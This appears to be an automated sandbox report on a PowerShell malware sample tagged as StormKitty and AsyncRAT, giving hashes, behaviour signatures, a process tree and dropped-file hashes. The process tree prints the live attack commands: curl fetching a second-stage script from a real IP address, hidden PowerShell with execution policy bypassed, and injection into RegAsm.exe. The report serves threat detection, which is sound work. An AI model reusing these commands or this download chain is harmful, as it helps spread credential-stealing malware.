Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-01-2025 05:11
Static task
static1
Behavioral task
behavioral1
Sample
sfqbr.ps1
Resource
win7-20241010-en
General
-
Target
sfqbr.ps1
-
Size
21KB
-
MD5
524fca1eea0f55f1ad6281325664dcb4
-
SHA1
fa39a3bb823909c0294804a32303378ac25e0492
-
SHA256
b62079be1556d96865a31929952afece7835218e748a8bb87aa9b6a662e25bff
-
SHA512
a8002af2535c7fa629b7375943ade44f36fe0b76ccc324ab35d09e96931f7e5fc82c88787a423ae96ad58d2683f870693edb6f5cbafdd4b6576f3d1a09ff24b2
-
SSDEEP
384:zIAXUpjxl+K++gtu0P1GUK++qUpjxl6Upjxl+mATyK++IcmATpPsPWmATEP9rPva:zIAMVl+7+gbh7+3VlnVliTy7+IITJqKh
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/3868-51-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 964 powershell.exe 10 4204 powershell.exe -
pid Process 964 powershell.exe 4204 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4204 set thread context of 3868 4204 powershell.exe 101 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 964 powershell.exe 964 powershell.exe 964 powershell.exe 964 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 3868 RegAsm.exe 3868 RegAsm.exe 3868 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeDebugPrivilege 3868 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3868 RegAsm.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 964 wrote to memory of 3068 964 powershell.exe 86 PID 964 wrote to memory of 3068 964 powershell.exe 86 PID 3068 wrote to memory of 3436 3068 cmd.exe 87 PID 3068 wrote to memory of 3436 3068 cmd.exe 87 PID 3068 wrote to memory of 4204 3068 cmd.exe 88 PID 3068 wrote to memory of 4204 3068 cmd.exe 88 PID 3436 wrote to memory of 4068 3436 cmd.exe 89 PID 3436 wrote to memory of 4068 3436 cmd.exe 89 PID 4204 wrote to memory of 3204 4204 powershell.exe 90 PID 4204 wrote to memory of 3204 4204 powershell.exe 90 PID 3204 wrote to memory of 1932 3204 csc.exe 91 PID 3204 wrote to memory of 1932 3204 csc.exe 91 PID 4204 wrote to memory of 4940 4204 powershell.exe 100 PID 4204 wrote to memory of 4940 4204 powershell.exe 100 PID 4204 wrote to memory of 4940 4204 powershell.exe 100 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101 PID 4204 wrote to memory of 3868 4204 powershell.exe 101
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\sfqbr.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps14⤵PID:4068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gvpiisla\gvpiisla.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA45E.tmp" "c:\Users\Admin\AppData\Local\Temp\gvpiisla\CSC377F0B6EB5714E3F98AFD823336B5146.TMP"5⤵PID:1932
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3868
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD52335c46fddbcb32fd0bf589f64513fd6
SHA13f7a096b2038624703694da1f68edf8fc2b1fc6d
SHA2566e210a3033e5880633ae2538fc5b89298017d1ceaaf0653c2b4d3d4739ed78ea
SHA51235825fd0b6242ae4b41780dfa447312ece6f67e0e7404ac33ad5ed85a8ff842d1d24441b46756ed2e44fe65fa2ccddbd8f109eeb1e8f7d948105763a22945e04
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5be186fcd638fcf5c7529f9981688b8bf
SHA19cf1438c1cb03097a77097d93c4f1a1d4cac4001
SHA256ac5517306a109b337c3faa7a11198bed8caccc0af9bf221c6020dd3e5ccdd439
SHA512963b4cf977eec2cd658dc15041878d0122d4f29b45c32c8b8a6fe01c2a4c2ddb4661db73edff3809ca8252cba6db3bcf72ff067427a55e625cc1f11c5d9fe1e5
-
Filesize
5KB
MD5380f7a432a6528223c05a2d48990827c
SHA1ea7d06b5acda2f1afacd348fe64454fadaa4ece4
SHA256cb6aaa288e92a75b77120f5996cddacf5374c5fcc3679f942554d52f740149c6
SHA512cf16e64182cab9f2ecf9ae4351be69d0bce0833973f2071df76e1061cda9128c54392ffde006c64d41f4c26d3086cdcc85ea0410ecb29887f72f40db33a0c803
-
Filesize
652B
MD5e26920016d175eb0e3b86adc7dbd38b0
SHA1df307bfc7ed6c6c84f4c813a36f000b267f2e957
SHA256847aa58c6bbe142db772938201e8c69043c3f55210176d4833d7991f90750092
SHA5126765d2a525f68e4e013af24fed17833443735f7c599c7d48b2f3725747de5a893a1f4ed9ea7df4122a9d606cdbb22884e35696362a13455d642221d1b9a5af14
-
Filesize
10KB
MD54cffc8d6fe3870e0046b7be9bff146aa
SHA1aee44d9772c5392c5da7237ba0090cbadfd4eeac
SHA256e6518d89d7c8f761a277fe634fed0c41a4deee7c8d5cd4eaca503d88f247ec83
SHA51242fa00f7ce8fb9f77f1c7b3b140bb6708d01609bbc77514e86d34c1ed82b2d6a0a4f4775674043c3e4a486e4e19f3dcf3c0d33f73fcd79e75126b2f42fac136a
-
Filesize
204B
MD5c0ad9b6512c68c4cacb371589a310d9c
SHA16256fad8c75e3ee5fd257e8d7db3d4b96da7b8f8
SHA2564212db676df0d84415b0e208184c3195ec2562b0161b4376c422d7e7d1fd8600
SHA512e226132493f354c1acc0d08c5904c14683069ff3b2091596b097b5a1da11e61dd85f27e5173725251ab1927de89fd715e1323d45353fcae81b78ce3402f9d8cc